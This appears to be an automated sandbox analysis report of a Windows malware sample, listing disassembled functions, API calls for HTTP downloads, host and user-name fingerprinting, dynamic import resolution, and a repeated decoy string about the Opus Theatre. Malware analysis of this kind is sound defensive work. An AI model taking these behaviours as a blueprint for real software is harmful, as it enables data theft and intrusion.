                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A34688
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A346B2
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A347B5
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A347C0
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A34667
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A34672
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A3476E
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A3479F
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A34712
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A34779
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A34693
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A346C8
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A3471D
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A347AA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeapProtectVirtual
                                      • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                      • API String ID: 1542196881-2218711628
                                      • Opcode ID: 9926c55c28cd1efe4659f462a3ab402ba2c077cb1c36abb1e0376ec79ce40417
                                      • Instruction ID: 032d1c753353975e2b2f0c4efc7253bbd38e74022941522cdf154da1ee9ff0b0
                                      • Opcode Fuzzy Hash: 9926c55c28cd1efe4659f462a3ab402ba2c077cb1c36abb1e0376ec79ce40417
                                      • Instruction Fuzzy Hash: 8D41F360AC3A047EE628FBB49C52D9F76667F47709F825848AC085A286CE70750F47B7
                                      Function 00A362D0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1033 a362d0-a3635b call a4aab0 call a34800 call a4aa50 InternetOpenA StrCmpCA 1040 a36364-a36368 1033->1040 1041 a3635d 1033->1041 1042 a36559-a36575 call a4aab0 call a4ab10 * 2 1040->1042 1043 a3636e-a36392 InternetConnectA 1040->1043 1041->1040 1061 a36578-a3657d 1042->1061 1044 a36398-a3639c 1043->1044 1045 a3654f-a36553 InternetCloseHandle 1043->1045 1047 a363aa 1044->1047 1048 a3639e-a363a8 1044->1048 1045->1042 1050 a363b4-a363e2 HttpOpenRequestA 1047->1050 1048->1050 1052 a36545-a36549 InternetCloseHandle 1050->1052 1053 a363e8-a363ec 1050->1053 1052->1045 1055 a36415-a36455 HttpSendRequestA HttpQueryInfoA 1053->1055 1056 a363ee-a3640f InternetSetOptionA 1053->1056 1059 a36457-a36477 call a4aa50 call a4ab10 * 2 1055->1059 1060 a3647c-a3649b call a48ad0 1055->1060 1056->1055 1059->1061 1066 a36519-a36539 call a4aa50 call a4ab10 * 2 1060->1066 1067 a3649d-a364a4 1060->1067 1066->1061 1070 a36517-a3653f InternetCloseHandle 1067->1070 1071 a364a6-a364d0 InternetReadFile 1067->1071 1070->1052 1075 a364d2-a364d9 1071->1075 1076 a364db 1071->1076 1075->1076 1080 a364dd-a36515 call a4acc0 call a4abb0 call a4ab10 1075->1080 1076->1070 1080->1071
                                      APIs
                                        • Part of subcall function 00A4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00A4AAF6
                                        • Part of subcall function 00A34800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A34889
                                        • Part of subcall function 00A34800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00A34899
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                      • InternetOpenA.WININET(00A50DFF,00000001,00000000,00000000,00000000), ref: 00A36331
                                      • StrCmpCA.SHLWAPI(?,0131F410), ref: 00A36353
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A36385
                                      • HttpOpenRequestA.WININET(00000000,GET,?,0131EE20,00000000,00000000,00400100,00000000), ref: 00A363D5
                                      • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00A3640F
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A36421
                                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00A3644D
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00A364BD
                                      • InternetCloseHandle.WININET(00000000), ref: 00A3653F
                                      • InternetCloseHandle.WININET(00000000), ref: 00A36549
                                      • InternetCloseHandle.WININET(00000000), ref: 00A36553
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                      • String ID: ERROR$ERROR$GET
                                      • API String ID: 3749127164-2509457195
                                      • Opcode ID: 4b4ddbd9c5395471e889f93b13c91ce716fb523d4a2151c838c01dd392da5a00
                                      • Instruction ID: d1757f4282a63b7162da97c34280d5e4fe24ad6b1c969840211c64f8ee86db7a
                                      • Opcode Fuzzy Hash: 4b4ddbd9c5395471e889f93b13c91ce716fb523d4a2151c838c01dd392da5a00
                                      • Instruction Fuzzy Hash: 72713D75A40318ABEB24DFA0CD59BEE7775BB44700F1081A8F50AAB294DBB46E84CF51
                                      Function 00A47690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1356 a47690-a476da GetWindowsDirectoryA 1357 a476e3-a47757 GetVolumeInformationA call a48e90 * 3 1356->1357 1358 a476dc 1356->1358 1365 a47768-a4776f 1357->1365 1358->1357 1366 a47771-a4778a call a48e90 1365->1366 1367 a4778c-a477a7 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 a477b8-a477e8 wsprintfA call a4aa50 1367->1369 1370 a477a9-a477b6 call a4aa50 1367->1370 1377 a4780e-a4781e 1369->1377 1370->1377
                                      APIs
                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00A476D2
                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A4770F
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A47793
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A4779A
                                      • wsprintfA.USER32 ref: 00A477D0
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                      • String ID: :$C$\
                                      • API String ID: 1544550907-3809124531
                                      • Opcode ID: 56811a9dc003dbaa30bae725fbe172b3de39d9aa49dc29791d96e2444a4512e8
                                      • Instruction ID: 48585fb2d7f8d45055886b3cff7e45c3c2d2ca1d94b6c4de7582b5f593d94f2a
                                      • Opcode Fuzzy Hash: 56811a9dc003dbaa30bae725fbe172b3de39d9aa49dc29791d96e2444a4512e8
                                      • Instruction Fuzzy Hash: A141B6B5D04348EBDB10DFA4DD45FDEBBB8AF48704F104199F609AB280D774AA44CBA5
                                      Function 00A479E0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00A311B7), ref: 00A47A10
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A47A17
                                      • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00A47A2F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateNameProcessUser
                                      • String ID:
                                      • API String ID: 1296208442-0
                                      • Opcode ID: 7ef24a7723a4d397a63f5f1e863d1fd2873aecf91721162eb3d83d6e4899b39a
                                      • Instruction ID: 8df709fbcf5bef8dc5fae4a4c89dd3425dcd055358a9cdbcfafaa78e16e0835d
                                      • Opcode Fuzzy Hash: 7ef24a7723a4d397a63f5f1e863d1fd2873aecf91721162eb3d83d6e4899b39a
                                      • Instruction Fuzzy Hash: 83F04FB1D48349EBC700DF98DD46BAEBBB8FB45711F10021AF619E6780C77525008BB1
                                      Function 00A31160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitInfoProcessSystem
                                      • String ID:
                                      • API String ID: 752954902-0
                                      • Opcode ID: d9b65a7abf220b3ac733655eaaf4e14a320b85c625c2e45a5530a0f348c81e29
                                      • Instruction ID: ec14491661c14bd124c2e4f568dbf6af4fb4783b4d64c46f7fe7c7ba5451e195
                                      • Opcode Fuzzy Hash: d9b65a7abf220b3ac733655eaaf4e14a320b85c625c2e45a5530a0f348c81e29
                                      • Instruction Fuzzy Hash: 89D09E74D0430C9BCB04DFE199496DDBB78FB0C615F101559E909A6380EA316455CA76
                                      Function 00A49F20 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 633 a49f20-a49f2a 634 a4a346-a4a3da LoadLibraryA * 8 633->634 635 a49f30-a4a341 GetProcAddress * 43 633->635 636 a4a456-a4a45d 634->636 637 a4a3dc-a4a451 GetProcAddress * 5 634->637 635->634 638 a4a526-a4a52d 636->638 639 a4a463-a4a521 GetProcAddress * 8 636->639 637->636 640 a4a52f-a4a5a3 GetProcAddress * 5 638->640 641 a4a5a8-a4a5af 638->641 639->638 640->641 642 a4a5b5-a4a642 GetProcAddress * 6 641->642 643 a4a647-a4a64e 641->643 642->643 644 a4a654-a4a72a GetProcAddress * 9 643->644 645 a4a72f-a4a736 643->645 644->645 646 a4a7b2-a4a7b9 645->646 647 a4a738-a4a7ad GetProcAddress * 5 645->647 648 a4a7ec-a4a7f3 646->648 649 a4a7bb-a4a7e7 GetProcAddress * 2 646->649 647->646 650 a4a825-a4a82c 648->650 651 a4a7f5-a4a820 GetProcAddress * 2 648->651 649->648 652 a4a922-a4a929 650->652 653 a4a832-a4a91d GetProcAddress * 10 650->653 651->650 654 a4a98d-a4a994 652->654 655 a4a92b-a4a988 GetProcAddress * 4 652->655 653->652 656 a4a996-a4a9a9 GetProcAddress 654->656 657 a4a9ae-a4a9b5 654->657 655->654 656->657 658 a4a9b7-a4aa13 GetProcAddress * 4 657->658 659 a4aa18-a4aa19 657->659 658->659
                                      APIs
                                      • GetProcAddress.KERNEL32(77190000,013055C8), ref: 00A49F3D
                                      • GetProcAddress.KERNEL32(77190000,01305528), ref: 00A49F55
                                      • GetProcAddress.KERNEL32(77190000,01319008), ref: 00A49F6E
                                      • GetProcAddress.KERNEL32(77190000,01319080), ref: 00A49F86
                                      • GetProcAddress.KERNEL32(77190000,01319020), ref: 00A49F9E
                                      • GetProcAddress.KERNEL32(77190000,0131D7D0), ref: 00A49FB7
                                      • GetProcAddress.KERNEL32(77190000,0130A640), ref: 00A49FCF
                                      • GetProcAddress.KERNEL32(77190000,0131D770), ref: 00A49FE7
                                      • GetProcAddress.KERNEL32(77190000,0131D740), ref: 00A4A000
                                      • GetProcAddress.KERNEL32(77190000,0131D6B0), ref: 00A4A018
                                      • GetProcAddress.KERNEL32(77190000,0131D710), ref: 00A4A030
                                      • GetProcAddress.KERNEL32(77190000,013055E8), ref: 00A4A049
                                      • GetProcAddress.KERNEL32(77190000,01305628), ref: 00A4A061
                                      • GetProcAddress.KERNEL32(77190000,01305408), ref: 00A4A079
                                      • GetProcAddress.KERNEL32(77190000,01305548), ref: 00A4A092
                                      • GetProcAddress.KERNEL32(77190000,0131D7E8), ref: 00A4A0AA
                                      • GetProcAddress.KERNEL32(77190000,0131D698), ref: 00A4A0C2
                                      • GetProcAddress.KERNEL32(77190000,0130A668), ref: 00A4A0DB
                                      • GetProcAddress.KERNEL32(77190000,01305588), ref: 00A4A0F3
                                      • GetProcAddress.KERNEL32(77190000,0131D728), ref: 00A4A10B
                                      • GetProcAddress.KERNEL32(77190000,0131D638), ref: 00A4A124
                                      • GetProcAddress.KERNEL32(77190000,0131D668), ref: 00A4A13C
                                      • GetProcAddress.KERNEL32(77190000,0131D758), ref: 00A4A154
                                      • GetProcAddress.KERNEL32(77190000,013055A8), ref: 00A4A16D
                                      • GetProcAddress.KERNEL32(77190000,0131D788), ref: 00A4A185
                                      • GetProcAddress.KERNEL32(77190000,0131D7A0), ref: 00A4A19D
                                      • GetProcAddress.KERNEL32(77190000,0131D6F8), ref: 00A4A1B6
                                      • GetProcAddress.KERNEL32(77190000,0131D680), ref: 00A4A1CE
                                      • GetProcAddress.KERNEL32(77190000,0131D7B8), ref: 00A4A1E6
                                      • GetProcAddress.KERNEL32(77190000,0131D650), ref: 00A4A1FF
                                      • GetProcAddress.KERNEL32(77190000,0131D6E0), ref: 00A4A217
                                      • GetProcAddress.KERNEL32(77190000,0131D6C8), ref: 00A4A22F
                                      • GetProcAddress.KERNEL32(77190000,0131D230), ref: 00A4A248
                                      • GetProcAddress.KERNEL32(77190000,0130FBC8), ref: 00A4A260
                                      • GetProcAddress.KERNEL32(77190000,0131D2A8), ref: 00A4A278
                                      • GetProcAddress.KERNEL32(77190000,0131D0C8), ref: 00A4A291
                                      • GetProcAddress.KERNEL32(77190000,01305708), ref: 00A4A2A9
                                      • GetProcAddress.KERNEL32(77190000,0131D140), ref: 00A4A2C1
                                      • GetProcAddress.KERNEL32(77190000,01305388), ref: 00A4A2DA
                                      • GetProcAddress.KERNEL32(77190000,0131D2C0), ref: 00A4A2F2
                                      • GetProcAddress.KERNEL32(77190000,0131D188), ref: 00A4A30A
                                      • GetProcAddress.KERNEL32(77190000,01305668), ref: 00A4A323
                                      • GetProcAddress.KERNEL32(77190000,013056A8), ref: 00A4A33B
                                      • LoadLibraryA.KERNEL32(0131D068,?,00A45EF3,00A50AEB,?,?,?,?,?,?,?,?,?,?,00A50AEA,00A50AE7), ref: 00A4A34D
                                      • LoadLibraryA.KERNEL32(0131D320,?,00A45EF3,00A50AEB,?,?,?,?,?,?,?,?,?,?,00A50AEA,00A50AE7), ref: 00A4A35E
                                      • LoadLibraryA.KERNEL32(0131D0E0,?,00A45EF3,00A50AEB,?,?,?,?,?,?,?,?,?,?,00A50AEA,00A50AE7), ref: 00A4A370
                                      • LoadLibraryA.KERNEL32(0131D0F8,?,00A45EF3,00A50AEB,?,?,?,?,?,?,?,?,?,?,00A50AEA,00A50AE7), ref: 00A4A382
                                      • LoadLibraryA.KERNEL32(0131D248,?,00A45EF3,00A50AEB,?,?,?,?,?,?,?,?,?,?,00A50AEA,00A50AE7), ref: 00A4A393
                                      • LoadLibraryA.KERNEL32(0131D2F0,?,00A45EF3,00A50AEB,?,?,?,?,?,?,?,?,?,?,00A50AEA,00A50AE7), ref: 00A4A3A5
                                      • LoadLibraryA.KERNEL32(0131D110,?,00A45EF3,00A50AEB,?,?,?,?,?,?,?,?,?,?,00A50AEA,00A50AE7), ref: 00A4A3B7
                                      • LoadLibraryA.KERNEL32(0131D128,?,00A45EF3,00A50AEB,?,?,?,?,?,?,?,?,?,?,00A50AEA,00A50AE7), ref: 00A4A3C8
                                      • GetProcAddress.KERNEL32(77040000,01305268), ref: 00A4A3EA
